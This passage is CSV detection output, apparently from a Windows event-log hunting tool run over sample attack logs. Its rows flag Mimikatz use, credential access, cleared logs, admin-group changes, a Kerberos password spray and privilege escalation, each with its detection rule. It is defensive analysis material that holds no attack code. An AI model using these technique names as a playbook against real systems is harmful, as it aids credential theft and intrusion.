+09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:18:01.228 
+09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : 
SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: 
OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: 
S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: 
CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 
+09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive 
account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: 
Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote 
Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: 
OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 
05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: 
admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes 
